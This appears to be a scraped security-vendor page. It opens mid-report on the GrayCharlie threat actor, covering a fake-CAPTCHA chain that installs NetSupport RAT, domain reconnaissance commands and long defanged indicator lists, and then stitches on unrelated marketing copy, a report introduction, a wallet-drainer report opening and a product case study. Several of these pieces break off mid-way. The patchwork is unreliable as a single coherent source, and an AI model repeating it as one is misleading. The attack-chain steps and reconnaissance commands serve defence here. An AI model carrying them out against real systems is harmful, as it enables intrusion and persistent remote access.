Figure 7: Fake Captcha (Source: Elastic)

1. Command-driven staging. The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into %AppData%\Roaming\ (see Figure 8).

Figure 8: PowerShell command (Source: Cybereason)

1. NetSupport RAT launch and persistence. The batch file starts client32.exe and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.
2. Remote access and follow-on actions. Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.

Observed Operator Activity

In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server 5[.]181[.]156[.]234[:]443 linked to GrayCharlie within a controlled environment. Later that day, approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see Figure 9).

net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"

Figure 9: Reconnaissance commands (Source: Recorded Future)

When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server 85[.]158[.]110[.]179[:]15847. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.

Mitigations

• Leverage the IoCs in Appendix A and Appendix B to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage the Sigma, YARA, and Snort rules provided in Appendices D, E, and F in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.
• Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.

Outlook

GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.

Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: Indicators of Compromise

Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
0e9df9294c36702eee970efcb4a70b6ddb433190ab661273e2e559185c55b6c1
112bf17e7c0d0695e9229d60f0d2734c6b96d7edfb41ea3e98e518f4fb1ae6e9
11370e108c8e7a53e52f01df0829c8addb5833145618a7701fbedbb1d837a43d
15dfe9d443027ba01b8f54f415fd74d373b3a06017db8ef110fb55b33357b190
16c8b5e10135d168d73a553a4bda51628e5b4fd419c0ecd47ca4cd7aa864ebd5
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
1900ca9b482273df3127e221526023c025808d8fd65769a418fe1f346e7d41e2
1c389bf1859a00c58b6a97c02fc26c2fe9766c43e06242a94e92b6585b62398b
21a24922b29742977c4f7e25dd2be056dc02bc5e70c98e32ec3e0c6206f4d9ef
312a0e4db34a40cb95ba1fac8bf87deb45d0c5f048d38ac65eb060273b07df67
31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c
31f69d67eca6f3fc837e8d10dff4e2fb6643e33c118cff87df4fee2b183bf0e0
37e8b57ff4d724053b1917dc6edaca0708d44ceecd00cab7e4cabb336c2868d7
3ac57bea954ce68dc937f6954ae8a6a19a367a579aeeda7cc93ddd5968fae250
3ada20fbd80ec7f536db8303a5fa029af741a6914de61376ac8f81ac3ac728fd
3b5658532bc4058131689c5641def85d7ae25d5b837d3d1aff3af7bb25581f17
3c499faac4b973c237670f046973691a245ecd735ffebcca3e93337d94b71cde
3c4b87be8450e3120b7ad2b11ff59850950beb39906dc1636b3ee7b6390f2086
4732f025a2a69f6c40787854c5da122689702f00f4f423061bb30ab7fa1e98d3
5381b2a7a77448c4908f5c79d21631f56c88ead0365981cac1dcaafe493c313e
53e9511401000f61c9d910b92cd6d5a58e38ae541975135944885e53fa91ecb7
5dfbd8cf98ebd4977d4f240dcabd5cd67b936c0095c2d5b9a77896daea877df6
5eebdb584a1acd6aacc36c59c22ec51bbd077d2dbbe0890b52e62fa6fb9cf784
5ff742e134e3d17ec7abea435f718e8f5603b95e7984e024b2310ac9ef862ddf
60ff43424c0ba9dc259ab32405345ef325a4cb4d0baf0c0b0c13f9d3672e99eb
68c6411cc9afa68047641932530cf7201f17029167d4811375f1458cae32c7bd
6b2c41b42f75e64d435ba56c2f2b6d79a11b862a2d994487dab3e51e298bc5c9
6b93b7372941a09f1ea69f8b71c5c4e211ea0f8a24061e702002ca84457bcddd
6d0857a9c77f9c5f2a5e6921e1cb9f7e1a5d6b947ad63b364d291157d3f840fb
70f3a6fdbbc5e2ae79c28b48b6478ee3c8ea6f2b705ca9dc9bf8e63a4f6e0c8d
72baf2ecb0a9df607e54b64c0925ffc6739ab5a8b18900bf5c1930bcc799395d
748d546c6db44f6aa4bbb8e586d79f56c63fa87580eb19a0f2d5079cbe0952b7
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89
797ae2dbb2c538710fefe75dbe380b9f55b614cb03c4ae09bb3172e8234dd9d9
7a73ae8cca6ce6fa88f89d6154811cb453d6e6db9fa8ed5fbdaf8895aae601a5
7b19538dcf6d4bb84590c458f09c5707c8db53a42861fa56533c49c1a3acd953
7e3634bfd66e601d7585b237437f11f7d614b33705ba5f7bd75ab176c8250d38
858dfa529b960c6f6226b53beb55ba1900d3f498ba7be40724ed5c16d7d5a44b
871e5629d9c8898babf3ed579586e3f5f94a6c4623d3a0a7f9a99bf9d95ffc7b
8763749fd09245e7fa8c0ee2cc797d5520a9ef5d6846f044a0cd7c969c4bd7d4
89d839bbdc786c006304f3c6c6939150380aaa9e84d82bc31cdf0cf7609a6243
8b21fbd40c89763f51d5e06680c0971623500f4724c25958446bac794797057b
8baebd525324297faf86639266060172ded963767c832a609a991fa92c8463ab
8d1ed904d90e08048f42cdc9a25c2159f0f8dc4aa9dc01b0207645ea53abe189
957ab8417606ad41ad31f006d997af3f647dd5215af899551d08b3b472a4bc85
a0332fe0baa316fe793e757f9cf5938b099e97dc4624ead6f3bad8555c8a419b
a1482e62ecc89696a75adea7052c2e98a75c9d37304723abd110d60962bafdb7
a28d0c82a2a37462c2975b5eda7f91e8fc3c2ed50abfe357948ec4faabbd4951
a6637685091835826e62af279cc6c648188797f9edc05a2399a6686349102774
a6f1f68827303e655488c8d54b3be3ce8b1097f3ff374a2e4bc82ff96812781c
abc5b2118bc1d8c82f3726a5e30cf22ae3fa1c572dd3327b281ea6fd97ae9c06
afc45cc0df7f7e481bff45c6f62a6418b6ae4c8b474ec36113e05ab7ca7e2743
b1f91355a8472e364e07f05dc69bbd9c74dc1943e9c4475f46c2b448bb6d6e5d
b2b7218c3f649b9077510aac309357e884c314e0f488abed391415defb249f4c
b6b685fe020c481161060df9dbef0fc205cde479056c18aaeae184daa3f8a9c0
b784301cb2edafea875f779cf24e018f06732561069f6c4c3d86548029671642
ba557bd6b2c1d3297b2c9bd7294e47b9ad9ec6a937cddc879dd563c61a9abcbd
bb451151e52f0868f98e32d26ffa7c2be412b47cd470bf90d3cfe777b4a19f85
bd39f32177dc7a20f5087c5460ebf589035d9051336c69f07a26398f76aec40e
bf37542e9eb7a3b2f51d107e56d7551e6248f06ce18918e3dda2ebe9da1b0e80
bf97c4ff35b5e2c039aa1f1a9a164b7ec4d9339a631c84910b9a4d03b7927b8a
c2ba0018de8dcf0abfb2669cce95ed09377e9a9da7ff8e74e95688c99a025634
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
c441afb337c4803eed20ae255fbad3cdfac2800475c51e00a55369909efb4c89
cc6ad344d30178e04e49ab16cd43744925676562aded051835fb3f73401f31fa
ceab18331f785d0bf215f551b90f00567e36d339ba8e3ed8e45c0ad410b25808
d02a1eb597c66b602ac7d55095f771345ff5e90905ea12e523df2095030752b6
d6142f48664208710bab9fcab8dfcda66ad75ad756d2ce9c3aa243dcbc29bf4a
d665a8547baf067f2216821ecd4145eab1c75868f024d09140fb265b819d5194
d8d2092e174240d7bac63a9e1c199b442e1cb0f39d7fa32510b1aa7717c3ae38
e24de02415946133176b66017d54a5dcd7270c83f5ef01d79faff4e64d13c63b
e5502722c2bb84876903549445534c47cdaa586a0bb1e5b3a53162d75cc6cb28
e66ae0ac443b5140a1b35b5aaa6899eea296d9d633988eb044a395a34a887431
e92e01977d85f6834f57bd09e29e654b10da798844e4a64470cb22dac78bef93
e9723a2a9ca45787c35b864605a6be71ccf12b2d96dad8e7fc39117f7ba29abb
f28bb7bc5c801d5444ba6816e3a91d5bfaf0307578b7a1529415fc220fd9e9e8
f86b6aa11a276c24dd80db48f43c8a2f0c8df6e5426a7a0fee322c0427421ebb

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com

Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.

The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.

Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.

What Network Intelligence Actually Means

Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.

At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.

What This Means in Practice

Consider what changes when your security operations can query global network intelligence.

Faster SOC Triage

Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.

Targeted or Opportunistic? Now You'll Know

When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.

Fraud Infrastructure Exposed

Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.

Attribution That Actually Holds Up

Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.

Integration Into Security Workflows

Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.

When Expertise Becomes Essential

For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.

Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.

The Compliance Framework That Enables Trust

Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.

These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.

Moving Forward

The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.

Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.

What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.

The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.

But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.

Today, Recorded Future's Insikt Group releases the 2026 State of Security report, our most comprehensive annual analysis of the forces shaping global security.

Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.

The End of Stability as a Baseline Assumption

Figure 1: 2025 redefined international relations (Source: Recorded Future)

Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.

This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.

Key Findings

• The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.
• As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.
• Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.
• The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.
• The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion

• Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.
• Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.
• Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.
• During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.
• A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.

Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team

The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.

That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.

The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.

The challenge: Inconsistent and analyst-dependent threat hunting

Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."

This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.

The transformation: Unified, repeatable threat hunting

Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."

The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."

Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."

Real-world impact: Upskilling junior analysts and enabling rapid response

According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.

First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.

Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.

Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."

